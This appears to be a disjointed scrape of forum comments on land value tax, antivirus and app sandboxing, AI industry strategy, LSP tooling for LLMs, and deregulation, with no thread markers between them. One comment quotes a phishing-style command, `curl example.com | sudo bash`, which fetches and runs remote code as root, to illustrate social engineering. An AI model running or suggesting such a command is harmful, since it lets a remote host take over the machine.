> How is this different from just having higher taxes on capital gains?
The goal of the deferment is to stop a negative outcome (the resident being forced to sell their property because of higher LVT taxes) from occurring until the resident actually wants to do so.
Chalk another one up for "Antiviruses causing more problems than solving them".
They 'worked' when they initially just scanned files for known malicious signatures. Now they're the equivalent of a sledgehammer to a wall with all of the extra bells & whistles strapped to them.
Application whitelisting is the remaining way forward if you actually care about runtime security. That & locking every access point down to the bare minimum.
I'm a firm believer that hardware virtualization is the way forward for security. Qubes OS has the right idea, but running an entire OS for every application is demanding.
IMO it would make more sense to run every app in its own scaled down VM, like Microdroid for Android. Windows 10 had Microsoft Defender Application Guard for Microsoft Edge, and as far as security goes it was a fortress.
Too bad they discontinued it, and that performance was subpar. I would have loved to see them develop the idea more.
Aren’t you then just moving the responsibility from OS (process isolation) to the CPU ? And doesn’t this whole thing break with practical realities, such as processes needing to interact with each other ?
How would you deal with a password manager or a clipboard in these cases, for example, without increasing friction for users ?
> And doesn’t this whole thing break with practical realities, such as processes needing to interact with each other ?
There will always be advantages and disadvantages to all of this. But the general idea is to protect the "core" OS, and for that virtualization is superior to anything else you could try really. Android and iOS are already built to isolate apps from one another. ChromeOS uses Crostini to run Linux programs in a VM, etc.
> without increasing friction
That's always the compromise with an Antivirus, isn't it? The logical thing would be to build password managers into the OS, or maybe even to handle them differently. As they are already done in Android and iOS today.
Processes are already hardware paravirtualization, and some early implementations even called them VMs. However, https://xkcd.com/2044/ is inescapable.
Antivirus is not a bad thing. Imagine running a company where there are 100 employees that click every link and open every attachment. Definitely safer with an antivirus.
I imagined it with employees on Linux and it wasn't clear to me it's definitely safer with an antivirus software. You are just stating things without explaining yourself...
Maybe you’re imagining no local privilege escalation vulnerabilities. Those are low severity in general, but if you can get a user to run something it’s all over.
How much do I need to go on? A foothold on a local computer allows the attacker to spread horizontally across your network.
It’s just a matter of time before you’re fighting real-time AI-driven attacks (most sites aren’t yet). Good luck even with your antivirus. Which I agree is going to be one of the footholds that is used against you.
how? if there's hundreds of employees and one of them downloads something that's detectable, you've now prevented a disaster that otherwise wouldn't have
Imagine they got an email from the HR department that says that they must copy `curl example.com | sudo bash` to prove they are human and get their salary...
You want to keep a building secure, so you have some structure of access and key managment, who has access to what and who do you let in.
Then you let access and key managment slide, your front-desktop lets in some shady people and their is a hole in your back wall.
The solution: add scaffolding around the facade and empower some security service staff to enter every room through every window and chime in on every front desk decision.
I would say white listing will have to happen for everything in the near future: applications, ports, URLs (including fragments!), filesystem hierarchies, basically everything.
I'm not sure it's doable with current OS architectures, though.
- you need to specify the rules before starting an application. How one is supposed to guess what application will do? Figuring out the correct rules may take lot of time and is impossible for non-programmers. Imagine I want to install 10 apps per day and they should work perfectly, how much time will I be spending writing rules?
- the rules cannot be changed in runtime, for example, giving access to a camera for 1 minute
- the rules are too limited. You can restrict access to a file, but can you restrict access to a DBUS bus? Can you restrict access to audio, video, GPU etc? To /proc filesystem? To a DNS domain? The rules feel like they were written for computers with teletypes from 70s and not for modern machines.
- they do not allow providing fake data, for example, a fake list of WiFi points so that the app thinks it has the access to your geolocation while in reality is doesn't.
So it is some outdated technology unfit for modern day.
What does a user want? The user wants to be able to run anything without any risk and without writing any config files. Obviously it takes a skill to write such OS, and there is definitely a lack of people with this skill among Linux distribution creators.
A system where installation is done using "curl + sudo bash" is the opposite of a safe OS.
Either you're engaged in some large-scale testing operation and your automation already handles it, or something has gone terribly wrong and the inconvenience of the sandboxing UI is the least of your concerns.
No, the point is that the amount of friction you can add to new app installs is much higher if you don’t optimize it for the unlikely case that your user is an app reviewer.
No, the point is that every time your computer isn't doing something you want it to do, you should be able to download a software package to make it do that.
> What I expected instead was a lot more discussion about use cases, benchmarking, possibilities, limitations (that aren't about git history) and the scope of future development.
HN had an Eternal September. Such discussions have been drowned out by the rest of the mob.
- They have internal models that still show there's gas in the tank, in terms of improvements
- Open models are eroding their customer base on the low end of the curve, & also you need not use Astra Max to classify images.
- The true demand for high-intelligence tasks is lower than what they need to justify their spending
- It would be wonderful for them to kick up a scare & give reasons as to why high-int open models should be regulated out of existence, opening up the lower end for them to take again
- Setting up an oligopoly for themselves gives them a captive audience, just like it did for (insurance, banking, telecoms, etc.) via regulatory capture
The demand for human-level intelligence is obviously at least the same order of magnitude as all office jobs combined.
I'm personally skeptical of LLMs getting there without at least one new invention. But it's also empirically clear that the pace continues to increase, even if we ignore that exponential growth is the default in economics in general.
> The demand for human-level intelligence is obviously at least the same order of magnitude as all office jobs combined.
1) That level of demand is likely true, but that doesn't mean that the total spending demand is to match to that level.
2) Most of said office work can be automated via normal software, and need not use LLMs. If they were to be automated, the amount of work left available for Anthropic to routinely work on would be (lower than before the automation took place).
> Is there any data you can provide to support your claim, or any result you can contribute here?
By the time we can show you data that convinces you that it does work, the next generation would already be out & incrementally dismantling the old conjectures that were true in the previous generations.
You're fundamentally asking for a violation of how information passively disseminates amongst humans: To go any faster requires more effort on the receiver's part to move up on the adoption curve.
Wouldn't this also mean that all previous generations that were proclaimed as intelligent and working were in fact... not?
It doesn't matter what comes tomorrow, with the next generation, if the claims now can't be proven.
To preempt the response: The math proof, regardless of them using non-disclosed user data or not, they spent $30M do do something closer to a 1000 monkeys approach, rather than a singular inference being very intelligent.
To preface -- I try not to be dogmatic/politicized on AI, so I will genuinely consider your arguments! Please try to convince me. (indeed, I am the grandparent commenter)
I agree with the meat of your statement, but am very interested in the pre-emption, "they spent $30M do do something closer to a 1000 monkeys approach, rather than a singular inference being very intelligent". First, I think the $30M number is inflated -- that's what the general public would have paid, but presumably the internal cost is lower, perhaps it's more like $10M. But it is still expensive. Second, I'm curious if it's really the case that they did a 1000-monkeys approach? I haven't read much in-depth reporting about the proof, so it's totally possible I just don't know. What is it that they did which is more like 1000-monkeys? Also, I wonder if that distinction matters -- if 1000 monkeys can reliably make ground breaking proofs, and the approach generalizes to other tasks, I will happily become a circus owner. Maybe you're claiming that it won't yield other proofs? Or the proofs are too opaque to be useful to humans? Or it can handle proofs but not other tasks?
I'll respond/comment on the parts I hope are relevant to you, in no particular order:
Yes, a proof is a proof regardless how you get there. We however don't hear about when they fail, and I doubt their 10000 agents (from their own statement) would necessarily reach another solution/proof (this by leaning towards using user data after finding out others were close). They could as well have attacked another Millenium problem, but they didn't. In whichever case, we will have to wait and see if they (either company) can reach novel solutions/proofs without significant amount of human provided data for the LLM to bridge the gaps.
Further, and this is more of a policy opinion/prediction: If the numerable obtainable (albeit very hard) problems are solved, assuming training data is needed, will it push out future researchers from entering the field due to lack of reachable goals, thus cutting off future training data? LLMs have been great at replacing gateway jobs. But those jobs are what leads to frontier training data (be it maths, physics, chemistry, economics, graphics, prose, etc).
Ah it's interesting they legitimately used 10k agents, I didn't realize that. I do agree that it's significant they solved the Millenium problem only once humans had made significant headway. I'm not sure I believe the relevant training data will be produced at a significantly lower rate due to AI -- Millenium problem solutions weren't generated at a very high rate before anyways. But I think all your points hold nonetheless. Thanks for elaborating on them!
It's OK to say you wish a politician was dead. It's not OK to pay someone to kill them. It's OK to say that you support some criminal activity (let's say Luigi), but it's not OK to offer direct financial support for their crimes.
> It's OK to say you wish a politician was dead. It's not OK to pay someone to kill them.
Both actions are equivalent, as such words are (social and/or political) capital bounties offered to the masses in return for fulfilling the death of said politician.
Capital always exists, even in the form of words. To deny a variant of capital whilst allowing another variant is inconsistent/doublespeak.
Just because it's not printed onto a piece of denominated paper, doesn't mean that such capital doesn't exist.
> Both actions are equivalent, as such words are (social and/or political) capital bounties offered to the masses in return for fulfilling the death of said politician.
Neither the law nor common interpretation of words agrees with this. There is a significant and crucial difference between words and actions.
> There is a significant and crucial difference between words and actions.
The difference is artificial, and delusionally blinds itself to the base reality that social/political capital exists.
Again, just because there isn't a cash figure attached to that bounty, doesn't mean that a reward hasn't been attached to it in the form of social/political prestige.
Setting up an LSP relies on 2 requirements to properly work:
(a) The LSP's tools being competently built & consistent, and
(b) the LLM using it having been properly trained to use LSPs in general.
Using a native tool like grep has the same 2 assumptions, but
(a) is satisfied due to ossification of grep's core features (a good thing), and
(b) is extra-satisfied because the LLM can be trained to properly use grep specifically, and not "20th variation of grep wrapped behind an LSP, but just different enough to throw curveballs".
On top of that, grep is almost always present in default Linux environments, so its presence is assumed & can be relied upon when needed.
> I assume that by this you mean something more nuanced than "we should abolish the FAA and let the airplanes crash until private enterprise solves it."
Strawman fallacy: It is in the interests of private enterprise to not have their $100-million+ airplanes crash, because it means $100-million+ going up in smoke. The owners of those planes would therefore have an interest in not having them crash.
> Or maybe "Let drug dealers (pharmaceutical companies) sell whatever the free market will bear without testing, safety, or the ability to hold them responsible."
Under this scenario, if the public finds out that a drug is harmful/lethal, the public jerks away from that drug towards solutions that have a reputation of working.
Is the resulting rate of fatality/worse-QOL lower than (a central authority filtering out drugs & holding them to standards)? No, definitely not. But the gap between the two is not infinite, and in most cases falls into an order of magnitude of difference.
-----
> I only ask, because there are some people who unironically think that we'd be more safe going back to the time before OSHA, or medical licensing, and some of them hang out here.
An axiom of (feeble-mindedness in the average person) is proposed here. People are as good/competent as the standards that they are held to.
> medical licensing
There's a difference between a certification of competency, and a deliberate constriction of the supply of medical residencies.
Following this hypothesis, it would be rationally beneficial to release a wild bear every 6 months or so, just to make sure that the 'fear bank' is occupied by things that warrant actual fear.
The goal of the deferment is to stop a negative outcome (the resident being forced to sell their property because of higher LVT taxes) from occurring until the resident actually wants to do so.
reply